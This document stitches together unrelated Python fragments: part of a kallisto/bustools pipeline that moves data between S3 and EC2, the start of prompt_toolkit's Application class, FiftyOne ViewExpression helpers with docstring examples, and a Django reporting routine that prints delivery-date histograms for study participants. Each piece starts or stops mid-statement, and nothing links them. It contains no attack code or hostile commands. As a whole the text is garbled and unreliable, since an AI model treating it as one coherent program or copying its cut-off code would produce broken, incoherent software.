s3_kb_ref["s3_" + arg + "_prefix"] = posixpath.join(
s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp"
)
else:
kb_ref_paths[arg + "_path"] = kallisto_index_outputs / os.path.basename(
getattr(args, arg)
)
(
s3_kb_ref["s3_" + arg + "_bucket"],
s3_kb_ref["s3_" + arg + "_prefix"],
) = s3u.s3_bucket_and_key(getattr(args, arg))
# Build the command of running `kb ref` to generate kallisto index files
ref_input_boolean = ["--lamanno", "--overwrite", "--keep-tmp", "--verbose"]
ref_input_upload_required = ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"]
ref_input_left_args = ["-d", "-n", "-k", "--workflow"]
kb_ref_command = ["kb", "ref"]
for input in ["fasta", "gtf"]:
if "-d" not in sys.argv:
print(
f"testing purpose: `ref` positional argument: {getattr(args, input)}"
) # testing purpose
if "--workflow" in sys.argv and "kite" in sys.argv:
print(
f"testing purpose: `ref` positional argument: {getattr(args, input)}"
) # testing purpose
kb_ref_command += [str(kb_ref_paths["feature_path"])]
kb_ref_command += [str(kb_ref_paths[input + "_path"])]
for input in ref_input_boolean:
if input in sys.argv:
kb_ref_command += [input]
for input in ref_input_upload_required:
if input in sys.argv:
kb_ref_command += [
input,
str(kb_ref_paths[input[2:] + "_path"])
if input == "--tmp"
else str(kb_ref_paths[input[1:] + "_path"]),
]
for input in ref_input_left_args:
if input in sys.argv:
kb_ref_command += [input, getattr(args, input)]
print(
f"testing purpose - check if kb_ref_command is of correct format: {kb_ref_command}"
) # testing purpose
# Run the command to generate kallisto index files, and upload the output files on the EC2 instance back to AWS S3
kb_ref_failed = ut_log.log_command(
logger,
kb_ref_command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
kb_ref_t_config = TransferConfig(
use_threads=False
) # testing purpose: comment this line if this runs into error. kallisto indices are not pretty big and don't necessarily need a transfer config
if kb_ref_failed:
raise RuntimeError("kallisto index building failed")
else:
kb_ref_upload_files = glob.glob(str(kallisto_index_outputs / "*"))
print(
f"testing purpose - check kallisto index files: {kb_ref_upload_files}"
) # testing purpose
for file in kb_ref_upload_files:
logger.info(
f"Uploading {os.path.basename(file)} from the EC2 instance to AWS S3"
)
s3c.upload_file(
Filename=file,
Bucket=kb_ref_output_to_s3[file][0],
Key=kb_ref_output_to_s3[file][1],
Config=kb_ref_t_config,
)
time.sleep(30)
print(
f"testing purpose - see if kb_ref upload_file function intakes correct bucket and prefix names for kallisto index output files: {kb_ref_output_to_s3[file][0]}, {kb_ref_output_to_s3[file][1]}"
) # testing purpose
return
def parse_count(args, run_dir, logger):
"""Parser for the `count` command. Data quantification with kallisto and bustools.
Keyword Arguments:
args -- Command-line arguments dictionary, as parsed by argparse (type: dict)
run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path)
logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger)
"""
# Build paths on the EC2 instance to store inputs and outputs of kb data quantification results.
kb_count_dir = run_dir / "kb_count"
kb_fastqs = kb_count_dir / "fastqs"
kb_count_inputs = kb_count_dir / "inputs"
kb_count_outputs = kb_count_dir / "outputs"
kb_fastqs.mkdir(parents=True)
kb_count_inputs.mkdir(parents=True)
kb_count_outputs.mkdir(parents=True)
kb_count_paths = dict()
s3_kb_count = dict()
for arg in ["--tmp", "-o", "-w", "-i", "-g", "-c1", "-c2"]:
if arg in sys.argv:
arg = arg[2:] if arg == "--tmp" else arg[1:]
print(
f"testing purpose - see if getattr(args, arg) returns the correct values for `kb count` inputs: {getattr(args, arg)}"
) # testing purpose
if arg == "tmp":
kb_count_paths[arg + "_path"] = kb_count_dir / "alter_tmp"
s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join(
s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp"
)
elif arg == "o":
kb_count_paths[arg + "_path"] = kb_count_outputs
s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join(
s3u.s3_bucket_and_key(getattr(args, arg))[1], "outputs"
)
else:
kb_count_paths[arg + "_path"] = kb_count_inputs / os.path.basename(
getattr(args, arg)
)
(
s3_kb_count["s3_" + arg + "_bucket"],
s3_kb_count["s3_" + arg + "_prefix"],
) = s3u.s3_bucket_and_key(getattr(args, arg))
s3c.download_file(
Bucket=s3_kb_count["s3_" + arg + "_bucket"],
Key=s3_kb_count["s3_" + arg + "_prefix"],
Filename=str(kb_count_paths[arg + "_path"]),
)
s3_kb_count["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key(
getattr(args, arg)
)[0]
# Download fastq files from the AWS S3 bucket to the EC2 instance.
(
kb_count_paths["fastqs_path"],
s3_kb_count["s3_fastqs_bucket"],
s3_kb_count["s3_fastqs_prefix"],
) = (dict(), dict(), dict())
kb_count_fastq_files_paths, s3_kb_count_fastqs_bucket, s3_kb_count_fastqs_prefix = (
kb_count_paths["fastqs_path"],
s3_kb_count["s3_fastqs_bucket"],
s3_kb_count["s3_fastqs_prefix"],
)
s3_fastq_folder_bucket, s3_fastq_folder_prefix = s3u.s3_bucket_and_key(
args.fastq_folder
)
s3_fastq_files_prefix = list(
s3u.get_files(bucket=s3_fastq_folder_bucket, prefix=s3_fastq_folder_prefix)
)[1:]
print(
"testing purpose - see if all fastq files prefix are extracted: {s3_fastq_files_prefix}"
) # testing purpose
fastq_format = re.compile("([^/]+)_R\d(?:_\d+)?.fastq.gz$")
for fastq_prefix in s3_fastq_files_prefix:
if not fastq_format.search(os.path.basename(fastq_prefix)):
continue
kb_count_fastq_files_paths[
os.path.basename(fastq_prefix)
] = kb_fastqs / os.path.basename(fastq_prefix)
s3_kb_count_fastqs_bucket[
os.path.basename(fastq_prefix)
] = s3_fastq_folder_bucket
s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)] = fastq_prefix
fastq_t_config = TransferConfig(
use_threads=False
) # testing purpose: comment this line if this runs into error.
s3c.download_file(
Bucket=s3_kb_count_fastqs_bucket[os.path.basename(fastq_prefix)],
Key=s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)],
Filename=str(kb_count_fastq_files_paths[os.path.basename(fastq_prefix)]),
Config=fastq_t_config,
)
# Build the command of running `kb count` to generate count matrices
count_input_boolean = [
"--keep-tmp",
"--verbose",
"--mm",
"--tcc",
"--overwrite",
"--lamanno",
"--nucleus",
"--loom",
"--h5ad",
]
count_input_file_transfer_required = ["--tmp", "-o", "-w"]
count_input_kb_indices = ["-i", "-g", "-c1", "-c2"]
count_input_left_args = ["-t", "-m", "--workflow", "--filter", "-x"]
kb_count_command = ["kb", "count"]
for fastq_path in kb_count_fastq_files_paths.values():
print(
f"testing purpose - view the paths of individual fastqs on the EC2 instance, i.e. values of dictionary `kb_count_fastq_files_paths`: {kb_count_fastq_files_paths.values()}"
) # testing purpose
kb_count_command += [str(fastq_path)]
for input in count_input_boolean:
if input in sys.argv:
kb_count_command += [input]
for input in count_input_file_transfer_required:
if input in sys.argv:
kb_count_command += [
input,
str(kb_count_paths[input[2:] + "_path"])
if input == "--tmp"
else str(kb_count_paths[input[1:] + "_path"]),
]
for input in count_input_kb_indices:
if input in sys.argv:
kb_count_command += [input, str(kb_count_paths[input[1:] + "_path"])]
for input | |
<reponame>j6k4m8/python-prompt-toolkit<filename>prompt_toolkit/application/application.py<gh_stars>0
from __future__ import unicode_literals
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.cache import SimpleCache
from prompt_toolkit.clipboard import Clipboard, InMemoryClipboard
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.eventloop import get_event_loop, ensure_future, Return, run_in_executor, run_until_complete, call_from_executor, From
from prompt_toolkit.eventloop.base import get_traceback_from_context
from prompt_toolkit.filters import to_filter, Condition
from prompt_toolkit.input.base import Input
from prompt_toolkit.input.defaults import get_default_input
from prompt_toolkit.input.typeahead import store_typeahead, get_typeahead
from prompt_toolkit.key_binding.bindings.page_navigation import load_page_navigation_bindings
from prompt_toolkit.key_binding.defaults import load_key_bindings
from prompt_toolkit.key_binding.key_bindings import KeyBindings, ConditionalKeyBindings, KeyBindingsBase, merge_key_bindings, GlobalOnlyKeyBindings
from prompt_toolkit.key_binding.key_processor import KeyProcessor
from prompt_toolkit.key_binding.emacs_state import EmacsState
from prompt_toolkit.key_binding.vi_state import ViState
from prompt_toolkit.keys import Keys
from prompt_toolkit.layout.controls import BufferControl
from prompt_toolkit.layout.dummy import create_dummy_layout
from prompt_toolkit.layout.layout import Layout, walk
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.output.defaults import get_default_output
from prompt_toolkit.renderer import Renderer, print_formatted_text
from prompt_toolkit.search import SearchState
from prompt_toolkit.styles import BaseStyle, default_ui_style, default_pygments_style, merge_styles, DynamicStyle, DummyStyle, StyleTransformation, DummyStyleTransformation
from prompt_toolkit.utils import Event, in_main_thread
from .current import set_app
from .run_in_terminal import run_in_terminal, run_coroutine_in_terminal
from subprocess import Popen
from traceback import format_tb
import os
import re
import signal
import six
import sys
import time
__all__ = [
'Application',
]
class Application(object):
"""
The main Application class!
This glues everything together.
:param layout: A :class:`~prompt_toolkit.layout.Layout` instance.
:param key_bindings:
:class:`~prompt_toolkit.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~prompt_toolkit.clipboard.Clipboard` to use.
:param on_abort: What to do when Control-C is pressed.
:param on_exit: What to do when Control-D is pressed.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
Filters:
:param mouse_support: (:class:`~prompt_toolkit.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~prompt_toolkit.filters.Filter` or boolean.
:param editing_mode: :class:`~prompt_toolkit.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept a
:class:`~prompt_toolkit.application.Application` object as input.)
:param on_reset: Called during reset.
:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
:param input: :class:`~prompt_toolkit.input.Input` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Application(...)
app.run()
"""
def __init__(self, layout=None,
style=None,
include_default_pygments_style=True,
style_transformation=None,
key_bindings=None, clipboard=None,
full_screen=False, color_depth=None,
mouse_support=False,
enable_page_navigation_bindings=None, # Can be None, True or False.
paste_mode=False,
editing_mode=EditingMode.EMACS,
erase_when_done=False,
reverse_vi_search_direction=False,
min_redraw_interval=None,
max_render_postpone_time=0,
on_reset=None, on_invalidate=None,
before_render=None, after_render=None,
# I/O.
input=None, output=None):
# If `enable_page_navigation_bindings` is not specified, enable it in
# case of full screen applications only. This can be overridden by the user.
if enable_page_navigation_bindings is None:
enable_page_navigation_bindings = Condition(lambda: self.full_screen)
paste_mode = to_filter(paste_mode)
mouse_support = to_filter(mouse_support)
reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
include_default_pygments_style = to_filter(include_default_pygments_style)
assert layout is None or isinstance(layout, Layout), 'Got layout: %r' % (layout, )
assert key_bindings is None or isinstance(key_bindings, KeyBindingsBase)
assert clipboard is None or isinstance(clipboard, Clipboard)
assert isinstance(full_screen, bool)
assert (color_depth is None or callable(color_depth) or
color_depth in ColorDepth._ALL), 'Got color_depth: %r' % (color_depth, )
assert isinstance(editing_mode, six.string_types)
assert style is None or isinstance(style, BaseStyle)
assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
assert isinstance(erase_when_done, bool)
assert min_redraw_interval is None or isinstance(min_redraw_interval, (float, int))
assert max_render_postpone_time is None or isinstance(max_render_postpone_time, (float, int))
assert on_reset is None or callable(on_reset)
assert on_invalidate is None or callable(on_invalidate)
assert before_render is None or callable(before_render)
assert after_render is None or callable(after_render)
assert output is None or isinstance(output, Output)
assert input is None or isinstance(input, Input)
if layout is None:
layout = create_dummy_layout()
if style_transformation is None:
style_transformation = DummyStyleTransformation()
self.style = style
self.style_transformation = style_transformation
# Key bindings.
self.key_bindings = key_bindings
self._default_bindings = load_key_bindings()
self._page_navigation_bindings = load_page_navigation_bindings()
self.layout = layout
self.clipboard = clipboard or InMemoryClipboard()
self.full_screen = full_screen
self._color_depth = color_depth
self.mouse_support = mouse_support
self.paste_mode = paste_mode
self.editing_mode = editing_mode
self.erase_when_done = erase_when_done
self.reverse_vi_search_direction = reverse_vi_search_direction
self.enable_page_navigation_bindings = enable_page_navigation_bindings
self.min_redraw_interval = min_redraw_interval
self.max_render_postpone_time = max_render_postpone_time
# Events.
self.on_invalidate = Event(self, on_invalidate)
self.on_reset = Event(self, on_reset)
self.before_render = Event(self, before_render)
self.after_render = Event(self, after_render)
# I/O.
self.output = output or get_default_output()
self.input = input or get_default_input()
# List of 'extra' functions to execute before a Application.run.
self.pre_run_callables = []
self._is_running = False
self.future = None
#: Quoted insert. This flag is set if we go into quoted insert mode.
self.quoted_insert = False
#: Vi state. (For Vi key bindings.)
self.vi_state = ViState()
self.emacs_state = EmacsState()
#: When to flush the input (For flushing escape keys.) This is important
#: on terminals that use vt100 input. We can't distinguish the escape
#: key from for instance the left-arrow key, if we don't know what follows
#: after "\x1b". This little timer will consider "\x1b" to be escape if
#: nothing did follow in this time span.
#: This seems to work like the `ttimeoutlen` option in Vim.
self.ttimeoutlen = .5 # Seconds.
#: Like Vim's `timeoutlen` option. This can be `None` or a float. For
#: instance, suppose that we have a key binding AB and a second key
#: binding A. If the uses presses A and then waits, we don't handle
#: this binding yet (unless it was marked 'eager'), because we don't
#: know what will follow. This timeout is the maximum amount of time
#: that we wait until we call the handlers anyway. Pass `None` to
#: disable this timeout.
self.timeoutlen = 1.0
#: The `Renderer` instance.
# Make sure that the same stdout is used, when a custom renderer has been passed.
self._merged_style = self._create_merged_style(include_default_pygments_style)
self.renderer = Renderer(
self._merged_style,
self.output,
self.input,
full_screen=full_screen,
mouse_support=mouse_support,
cpr_not_supported_callback=self.cpr_not_supported_callback)
#: Render counter. This one is increased every time the UI is rendered.
#: It can be used as a key for caching certain information during one
#: rendering.
self.render_counter = 0
# Invalidate flag. When 'True', a repaint has been scheduled.
self._invalidated = False
self._invalidate_events = [] # Collection of 'invalidate' Event objects.
self._last_redraw_time = 0 # Unix timestamp of last redraw. Used when
# `min_redraw_interval` is given.
#: The `InputProcessor` instance.
self.key_processor = KeyProcessor(_CombinedRegistry(self))
# If `run_in_terminal` was called. This will point to a `Future` what will be
# set at the point when the previous run finishes.
self._running_in_terminal = False
self._running_in_terminal_f = None
# Trigger initialize callback.
self.reset()
def _create_merged_style(self, include_default_pygments_style):
"""
Create a `Style` object that merges the default UI style, the default
pygments style, and the custom user style.
"""
dummy_style = DummyStyle()
pygments_style = default_pygments_style()
@DynamicStyle
def conditional_pygments_style():
if include_default_pygments_style():
return pygments_style
else:
return dummy_style
return merge_styles([
default_ui_style(),
conditional_pygments_style,
DynamicStyle(lambda: self.style),
])
@property
def color_depth(self):
"""
Active :class:`.ColorDepth`.
"""
depth = self._color_depth
if callable(depth):
depth = depth()
if depth is None:
depth = ColorDepth.default()
return depth
@property
def current_buffer(self):
"""
The currently focused :class:`~.Buffer`.
(This returns a dummy :class:`.Buffer` when none of the actual buffers
has the focus. In this case, it's really not practical to check for
`None` values or catch exceptions every time.)
"""
return self.layout.current_buffer or Buffer(name='dummy-buffer') # Dummy buffer.
@property
def current_search_state(self):
"""
Return the current :class:`.SearchState`. (The one for the focused
:class:`.BufferControl`.)
"""
ui_control = self.layout.current_control
if isinstance(ui_control, BufferControl):
return ui_control.search_state
else:
return SearchState() # Dummy search state. (Don't return None!)
def reset(self):
"""
| |
whether any of the given expressions evaluate to True.
If no expressions are provided, returns False.
Examples::
import fiftyone as fo
import fiftyone.zoo as foz
from fiftyone import ViewField as F
dataset = foz.load_zoo_dataset("quickstart")
# Create a view that only contains predictions that are "cat" or
# highly confident
is_cat = F("label") == "cat"
is_confident = F("confidence") > 0.95
view = dataset.filter_labels(
"predictions", F.any([is_cat, is_confident])
)
print(dataset.count("predictions.detections"))
print(view.count("predictions.detections"))
Args:
exprs: a :class:`ViewExpression` or iterable of
:class:`ViewExpression` instances
Returns:
a :class:`ViewExpression`
"""
if isinstance(exprs, ViewExpression) or not etau.is_container(exprs):
exprs = [exprs]
else:
exprs = list(exprs)
num_exprs = len(exprs)
if num_exprs == 0:
return ViewExpression(False)
if num_exprs == 1:
return exprs[0]
return ViewExpression({"$or": exprs})
@staticmethod
def all(exprs):
"""Checks whether all of the given expressions evaluate to True.
If no expressions are provided, returns True.
Examples::
import fiftyone as fo
import fiftyone.zoo as foz
from fiftyone import ViewField as F
dataset = foz.load_zoo_dataset("quickstart")
# Create a view that only contains predictions that are "cat" and
# highly confident
is_cat = F("label") == "cat"
is_confident = F("confidence") > 0.95
view = dataset.filter_labels(
"predictions", F.all([is_cat, is_confident])
)
print(dataset.count("predictions.detections"))
print(view.count("predictions.detections"))
Args:
exprs: a :class:`ViewExpression` or iterable of
:class:`ViewExpression` instances
Returns:
a :class:`ViewExpression`
"""
if isinstance(exprs, ViewExpression) or not etau.is_container(exprs):
exprs = [exprs]
else:
exprs = list(exprs)
num_exprs = len(exprs)
if num_exprs == 0:
return ViewExpression(True)
if num_exprs == 1:
return exprs[0]
return ViewExpression({"$and": exprs})
@staticmethod
def range(start, stop=None):
"""Returns an array expression containing the sequence of integers from
the specified start (inclusive) to stop (exclusive).
If ``stop`` is provided, returns ``[start, start + 1, ..., stop - 1]``.
If no ``stop`` is provided, returns ``[0, 1, ..., start - 1]``.
Examples::
import fiftyone as fo
from fiftyone import ViewField as F
dataset = fo.Dataset()
dataset.add_samples(
[
fo.Sample(filepath="image1.jpg", tags=["a", "b", "c"]),
fo.Sample(filepath="image2.jpg", tags=["y", "z"]),
]
)
# Populates an `ints` field based on the number of `tags`
dataset.add_sample_field("ints", fo.ListField)
view = dataset.set_field("ints", F.range(F("tags").length()))
print(view.first())
Args:
start: the starting value, or stopping value if no ``stop`` is
provided
stop (None): the stopping value, if both input arguments are
provided
Returns:
a :class:`ViewExpression`
"""
if stop is None:
stop = start
start = 0
return ViewExpression({"$range": [start, stop]})
@staticmethod
def enumerate(array, start=0):
"""Returns an array of ``[index, element]`` pairs enumerating the
elements of the given expression, which must resolve to an array.
Examples::
import fiftyone as fo
from fiftyone import ViewField as F
dataset = fo.Dataset()
dataset.add_samples(
[
fo.Sample(filepath="image1.jpg", tags=["a", "b", "c"]),
fo.Sample(filepath="image2.jpg", tags=["y", "z"]),
]
)
# Populates an `enumerated_tags` field with the enumerated `tag`
dataset.add_sample_field("enumerated_tags", fo.ListField)
view = dataset.set_field("enumerated_tags", F.enumerate(F("tags")))
print(view.first())
Args:
array: a :class:`ViewExpression` that resolves to an array
start (0): the starting enumeration index to use
Returns:
a :class:`ViewExpression`
"""
expr = ViewExpression.zip(
ViewExpression.range(start, stop=start + array.length()), array,
)
return array.let_in(expr)
@staticmethod
def zip(*args, use_longest=False, defaults=None):
"""Zips the given expressions, which must resolve to arrays, into an
array whose ith element is an array containing the ith element from
each input array.
Examples::
import fiftyone as fo
from fiftyone import ViewField as F
dataset = fo.Dataset()
dataset.add_samples(
[
fo.Sample(
filepath="image1.jpg",
tags=["a", "b", "c"],
ints=[1, 2, 3, 4, 5],
),
fo.Sample(
filepath="image2.jpg",
tags=["y", "z"],
ints=[25, 26, 27, 28],
),
]
)
dataset.add_sample_field("tags_ints", fo.ListField)
# Populates an `tags_ints` field with the zipped `tags` and `ints`
view = dataset.set_field("tags_ints", F.zip(F("tags"), F("ints")))
print(view.first())
# Same as above but use the longest array to determine output size
view = dataset.set_field(
"tags_ints",
F.zip(F("tags"), F("ints"), use_longest=True, defaults=("", 0))
)
print(view.first())
Args:
*args: one or more arrays or :class:`ViewExpression` instances
resolving to arrays
use_longest (False): whether to use the longest array to determine
the number of elements in the output array. By default, the
length of the shortest array is used
defaults (None): an optional array of default values of same length
as ``*args`` to use when ``use_longest == True`` and the input
arrays are of different lengths. If no defaults are provided
and ``use_longest == True``, then missing values are set to
``None``
Returns:
a :class:`ViewExpression`
"""
if not use_longest:
return ViewExpression({"$zip": {"inputs": list(args)}})
zip_expr = {"inputs": list(args), "useLongestLength": True}
if defaults is not None:
zip_expr["defaults"] = defaults
return ViewExpression({"$zip": zip_expr})
# Experimental expressions ###############################################
def _function(self, function):
function = " ".join(function.split())
return ViewExpression(
{"$function": {"body": function, "args": [self], "lang": "js"}}
)
class ViewField(ViewExpression):
"""A :class:`ViewExpression` that refers to a field or embedded field of a
document.
You can use
`dot notation <https://docs.mongodb.com/manual/core/document/#dot-notation>`_
to refer to subfields of embedded objects within fields.
When you create a :class:`ViewField` using a string field like
``ViewField("embedded.field.name")``, the meaning of this field is
interpreted relative to the context in which the :class:`ViewField` object
is used. For example, when passed to the :meth:`ViewExpression.map` method,
this object will refer to the ``embedded.field.name`` object of the array
element being processed.
In other cases, you may wish to create a :class:`ViewField` that always
refers to the root document. You can do this by prepending ``"$"`` to the
name of the field, as in ``ViewField("$embedded.field.name")``.
Examples::
from fiftyone import ViewField as F
# Reference the root of the current context
F()
# Reference the `ground_truth` field in the current context
F("ground_truth")
# Reference the `label` field of the `ground_truth` object in the
# current context
F("ground_truth.label")
# Reference the root document in any context
F("$")
# Reference the `label` field of the root document in any context
F("$label")
# Reference the `label` field of the `ground_truth` object in the root
# document in any context
F("$ground_truth.label")
.. automethod:: __eq__
.. automethod:: __ge__
.. automethod:: __gt__
.. automethod:: __le__
.. automethod:: __lt__
.. automethod:: __ne__
.. automethod:: __and__
.. automethod:: __invert__
.. automethod:: __or__
.. automethod:: __abs__
.. automethod:: __add__
.. automethod:: __ceil__
.. automethod:: __floor__
.. automethod:: __round__
.. automethod:: __mod__
.. automethod:: __mul__
.. automethod:: __pow__
.. automethod:: __sub__
.. automethod:: __truediv__
.. automethod:: __getitem__
Args:
name (None): the name of the field, with an optional "$" preprended if
you wish to freeze this field to the root document
"""
def __init__(self, name=None):
if name is None:
name = ""
should_freeze = name.startswith("$")
if should_freeze:
name = name[1:]
super().__init__(name)
if should_freeze:
self._freeze_prefix("")
def __deepcopy__(self, memo):
obj = self.__class__()
obj._expr = deepcopy(self._expr, memo)
obj._prefix = deepcopy(self._prefix, memo)
return obj
def to_mongo(self, prefix=None):
"""Returns a MongoDB representation of the field.
Args:
prefix (None): an optional prefix to prepend to the field name
Returns:
a string
"""
if self.is_frozen:
prefix = self._prefix
if prefix:
return prefix + "." + self._expr if self._expr else prefix
if self._expr:
return "$" + self._expr
if self.is_frozen:
return "$$ROOT"
return "$$CURRENT"
class ObjectId(ViewExpression):
"""A :class:`ViewExpression` that refers to an
`ObjectId <https://docs.mongodb.com/manual/reference/method/ObjectId>`_ of
a document.
The typical use case for this class is writing an expression that involves
checking if the ID of a document matches a particular known ID.
Example::
from fiftyone import ViewField as F
from fiftyone.core.expressions import ObjectId
# Check if the ID of the document matches the given ID
expr = F("_id") == ObjectId("5f452489ef00e6374aad384a")
Args:
oid: the object ID string
"""
def __init__(self, oid):
_ = bson.ObjectId(oid) # validates that `oid` is valid value
super().__init__(oid)
def to_mongo(self, prefix=None):
"""Returns a MongoDB representation of the ObjectId.
Args:
prefix (None): unused
Returns:
a MongoDB expression
"""
return {"$toObjectId": self._expr}
def _do_to_mongo(val, prefix):
if isinstance(val, ViewExpression):
return val.to_mongo(prefix=prefix)
if isinstance(val, dict):
return {
_do_to_mongo(k, prefix): _do_to_mongo(v, prefix)
for k, v in val.items()
}
if isinstance(val, list):
return [_do_to_mongo(v, prefix) for v in val]
if isinstance(val, (date, datetime)):
# The arg needs must be float (not int) to avoid errors near the epoch
return {"$toDate": fou.datetime_to_timestamp(val)}
if isinstance(val, timedelta):
return fou.timedelta_to_ms(val)
return val
def _do_freeze_prefix(val, prefix):
def fcn(val):
if not val.is_frozen:
val._prefix = prefix
return _do_recurse(val, fcn)
def _do_apply_memo(val, old, new):
def fcn(val):
if val is old:
return new
val._expr = _do_apply_memo(val._expr, old, new)
return val
return _do_recurse(val, fcn)
def _do_recurse(val, fcn):
if isinstance(val, ViewExpression):
| |
date - (id due_date delivery_date)')
for p in dd[:5]:
self.stdout.write( "\t{0.study_id} {0.due_date} {0.delivery_date} {0.study_group} (weeks {1:.0f})".format(
p, p.delta_days() / 7
) )
self.stdout.write( '\n')
# Add edd to dd delta seconds
dd_min , dd_max , dd_total , dd_count = None , None , 0 , dd.count()
dd_hist = [0 for _ in range(-10,11)]
for p in dd:
p.dd_delivery_delta = (p.delivery_date - p.due_date).total_seconds()
if dd_min is None or dd_min.dd_delivery_delta > p.dd_delivery_delta:
dd_min = p
if dd_max is None or dd_max.dd_delivery_delta < p.dd_delivery_delta:
dd_max = p
dd_total += p.dd_delivery_delta
dd_weeks = int(p.dd_delivery_delta / 604800) + 10
if dd_weeks < 0:
dd_weeks = 0
elif dd_weeks > 20:
dd_weeks = 20
dd_hist[dd_weeks] += 1
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
dd_min.study_id , dd_min.dd_delivery_delta/604800 ,
dd_max.study_id , dd_max.dd_delivery_delta/604800,
dd_total/(dd_count*604800)
) )
table = ""
for c in range(-10,11):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in dd_hist:
table += ' {:2.0f} '.format(c)
self.stdout.write(table)
# Add ANC Signup Week
ll = c_all.filter(study_group='two-way',delivery_date__isnull=False)
# ll = c_all.filter(delivery_date__isnull=False)
ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count()
ll_hist = collections.Counter()
for p in ll:
p.ll_due_delta = (p.delivery_date - p.created.date()).days
if ll_min is None or ll_min.ll_due_delta > p.ll_due_delta:
ll_min = p
if ll_max is None or ll_max.ll_due_delta < p.ll_due_delta:
ll_max = p
ll_total += p.ll_due_delta
ll_hist[ p.ll_due_delta // 7 ] += 1
self.stdout.write( '\n\n **** Signup to EDD Delta ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ll_min.study_id , ll_min.ll_due_delta // 7 ,
ll_max.study_id , ll_max.ll_due_delta // 7,
ll_total/(ll_count * 7)
) )
table = ""
for c in range( min(ll_hist), 43 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( min(ll_hist), 43):
table += ' {:2.0f} '.format(ll_hist[c])
self.stdout.write(table)
# Add delivery to loss delta (weeks)
ll = c_all.filter(loss_date__isnull=False)
ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count()
ll_hist = collections.Counter()
for p in ll:
p.ll_notification_delta = p.delivery_notification_delta
if ll_min is None or ll_min.ll_notification_delta > p.ll_notification_delta:
ll_min = p
if ll_max is None or ll_max.ll_notification_delta < p.ll_notification_delta:
ll_max = p
ll_total += p.ll_notification_delta
ll_hist[ p.ll_notification_delta // 7 ] += 1
self.stdout.write( '\n\n **** Delivery to Loss Date ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ll_min.study_id , ll_min.ll_notification_delta // 7 ,
ll_max.study_id , ll_max.ll_notification_delta // 7,
ll_total/(ll_count * 7)
) )
table = ""
for c in range( 0 , max(ll_hist.keys())+1 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( 0 , max(ll_hist.keys())+1 ):
table += ' {:2.0f} '.format(ll_hist[c])
self.stdout.write(table)
# Add stop date hist
ss = c_all.filter(statuschange__new='stopped')
ss_min , ss_max , ss_total , ss_count = None , None , 0 , ss.count()
ss_hist = collections.Counter()
for p in ss:
p.ss_notification_delta = p.stopped_study_delta
if ss_min is None or ss_min.ss_notification_delta > p.ss_notification_delta:
ss_min = p
if ss_max is None or ss_max.ss_notification_delta < p.ss_notification_delta:
ss_max = p
ss_total += p.ss_notification_delta
ss_hist[ p.ss_notification_delta // 28 * 4 ] += 1
self.stdout.write( '\n\n **** Study Start To Stop Weeks ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ss_min.study_id , ss_min.ss_notification_delta // 7 ,
ss_max.study_id , ss_max.ss_notification_delta // 7,
ss_total/(ss_count * 7)
) )
table = ""
for c in range( 0 , max(ss_hist.keys())+1, 4 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( 0 , max(ss_hist.keys())+1, 4 ):
table += ' {:2.0f} '.format(ss_hist[c])
self.stdout.write(table)
self.print_delivery_source()
def print_delivery_source(self):
self.print_header('Participant Delivery Source (control,one-way,two-way)')
source_groups = cont.Contact.objects_no_link.filter(delivery_date__isnull=False).order_by().values('facility',\
